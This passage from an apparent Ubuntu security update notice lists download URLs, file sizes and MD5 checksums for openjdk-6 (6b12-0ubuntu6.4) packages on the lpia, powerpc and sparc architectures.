      Size/MD5:  9947530 6bb618600d7c1f7ec68a68519094e0d9
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.4_lpia.deb
      Size/MD5: 25207906 1b334898157a834ab05ee74593ce57e4
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.4_lpia.deb
      Size/MD5:   227556 ad49784b480e88550c61dfc069cb4d2a

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.4_powerpc.deb
      Size/MD5:    77056 11313904c64bee4204f6369b4ffd5e66
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.4_powerpc.deb
      Size/MD5: 35898024 50945e6c1cbed766ea52b78fb7ed2ac5
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.4_powerpc.deb
      Size/MD5:  2393022 c04df84eeb2373a7f0cd84ad85610188
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.4_powerpc.deb
      Size/MD5:  8600518 197d84aae1eaafdab671a5749b42b86c
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.4_powerpc.deb
      Size/MD5: 22988430 27721c39140811fd6ef9b00124c10b70
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.4_powerpc.deb
      Size/MD5:   255542 a7d6deeb5ef7143bb8631c593f4c36c6

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.4_sparc.deb
      Size/MD5:    70098 44eca12cf6d8ed10e02a755772052b5b
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.4_sparc.deb
      Size/MD5: 103688730 0034a5b63b78e38f3c5bb0d0b920b9cf
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.4_sparc.deb
      Size/MD5:  2355160 e8adc4df2d4bc39f66da967b5272d455
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.4_sparc.deb
      Size/MD5:  9940784 c35a4115f4587df050af4c16de829674
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.4_sparc.deb
      Size/MD5: 25193444 0e4de129d523ef09bed9e3a22c6cecf3
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.4_sparc.deb
      Size/MD5:   233052 1773a666f39a632f458e850fb300ef12



